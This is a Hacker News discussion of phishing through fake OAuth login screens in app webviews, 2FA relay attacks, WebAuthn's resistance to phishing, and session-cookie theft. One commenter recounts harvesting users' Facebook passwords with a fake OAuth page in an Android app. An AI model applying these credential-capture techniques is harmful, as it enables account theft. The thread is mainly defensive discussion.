Hacker News new | past | comments | ask | show | jobs | submit login

I think the trick here was to prompt the user with a fake oauth screen. Many legit apps show the oauth screen using a web frame inside that app. It is absolutely stupid that it is still a common occurrence.

If you need to enter your credentials when using sign-in-using-xxx, be VERY cautious. Even if you have 2FA enabled, the fake oauth screen can just ask you for the 2FA code. You have no way of knowing whether the login page is keylogged or hijacked.




This was pretty much an exact question I had about OAuth 10 months ago:

Something I still don't understand about the OAuth flow is how it's _not_ training users to be more easily phished for actual usernames and passwords. The very first step is "If you are not logged into the third-party, display a login-form from the third-party."

The thing is, you never really know off-hand if you're logged into the third-party (provider) or not without opening a second tab and going directly to the third-party's site, since you're always getting logged out after various timeouts, cookie-clearing, browser-closing, and computer-restarting events.

What prevents an OAuth client application from displaying an OAuth process that shows a fake login form, which looks identical to the provider's login form, to get the user to enter their provider username and password before they realize the URL is off? It seems like it trains users that it's normal for websites to launch a Gmail login form and this is perfectly safe.

https://news.ycombinator.com/item?id=21357370


I think you're right. Users are being trained to enter their passwords and 2FA tokens everywhere with the false promise that 2FA makes it secure. Even U2F using a signed challenge seems iffy to me.

This [1] says "In fact, the spec requires that browsers only expose the API in secure contexts", so if that's correct it's better, but still not good enough.

This [2] looks like it does U2F by grabbing the challenges via browser plugin and relaying them to a phone app for signing.

Trusting the browser to "expose the API in secure contexts" seems like a failure because it's assuming nothing else can collect the credentials or send a challenge to a security key. Is that true? Could I write an app that would phish a user into signing a challenge with their security key?

1. https://security.stackexchange.com/a/206549/134291

2. https://krypt.co


> Could I write an app that would phish a user into signing a challenge with their security key?

What sort of app? A full-blown Windows/ OS X/ Linux desktop application? Yes.

You definitely should not install software that asks you to interact with your FIDO authenticator in this way unless you really trust it. I trust the Operating System vendor installed OpenSSH packages, I would not trust some random github project.

The two big phone ecosystems won't let you talk directly to a third party authenticator or to their built-in platform authenticator. The authenticator talks to them, and they talk to you. So while it would be possible to make a Windows EXE program that says "Touch authenticator to stroke your 3D pet" or whatever and actually steals your Facebook login credential this way, it should not be possible to put something on Google Play or Apple's iPhone store that does the same thing.

Edited to add: For Android at least there is a concept of "Privileged" apps that get to do stuff that is otherwise impossible to ask a user for permission to do. The ability to fill out WebAuthn-style rpId values (for WebAuthn these are Internet FQDNs) is locked behind such a privilege. So, Chrome has privilege, release builds of Firefox have privilege, and so on, but yet another fly-by-night app developer who uploads Flappy Bird clones to the Play Store can't use this feature.

Without this privilege when you talk to the authenticator (either a platform authenticator or a 3rd party one) the OS will insist on picking an rpId with a platform specific prefix. So e.g. maybe your app can ask for rpId android-584fac03:google.com but there's no way (without privilege) to get just google.com, which is a problem because that's the value you'd need in order to get working Google credentials.

If you want your app to talk to your own web site, you can build a bunch of extra goops (in Android at least) to enable that, but part of what will happen is your web site's backend code needs to explicitly go "OK, I should allow android-584fac03:my-private-app even though that's nowhere close to my actual FQDN" so that seems safe enough.


I'd guess it's a fake oauth screen as well. I coded one of the first (I think) Tinder auto likers for Android back in 2013, and the only way I could do it was get the real facebook username and password and log into Tinder on the phone in the background. I just put up a fake Oauth HTML page in a webview and saved the login, with a disclaimer of course, but nearly everybody ignored it. I was surprised how easy it all was.


> Even if you have 2FA enabled, the fake oauth screen can just ask you for the 2FA code.

Not all 2FA is “enter a code”; it's a lot harder for a fake oauth screen to send a request to your registered authentication device.

EDIT: this doesn't really help, as a reply points out. OTOH, separate side channel verification of logon from unexpected devices does.


Is it? Couldn't the backend (or even a human attacker) just type the credentials you provide into the real login page, giving you the "tap yes" push notification just the same?


Come to think of it, you're right. I was mentally combining that 2FA method with “new device attempted login” detection, but the latter is usually separate from 2FA. If a login system uses that and provides notice and requires confirmation through a side channel, rather than merely providing informational notice, it will stop (or at least, make it easier to stop; a second user mistake or preexisting side-channel compromise is still possible) the attack. If it's just notice, it at may limit the impact or streamline recovery from the attack.

But now that I think about it, it would make sense to combine new device notification with push-notice 2FA for exactly that reason, since you've got a push channel that takes a confirmation already, flag unexpected devices in that channel as well and it becomes much more secure.



Yup. Notice that this can't work on WebAuthn (or its predecessor U2F), which is why everything should do WebAuthn and you should ignore attempts to downgrade you to any other method.

An attacker can play the legitimate WebAuthn request from the real site, which will (statistically certain) be nonsense if played by their phishing site.

Or they make their own request, which doesn't help them because it's not valid on the real site they want to sign into so it's pointless.


In this case the application shows real facebook in a webview and after user logged in, the application retrieved the session cookie from the webview. How webauthn will behave here?


If you can steal the session cookie and the session cookie is what you needed then WebAuthn doesn't change anything.


And even if you find a correct oauth address, you still have the risk that you understand what permissions you give and facebook implements them correctly.


This wasn't mentioned anywhere in the article sadly




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: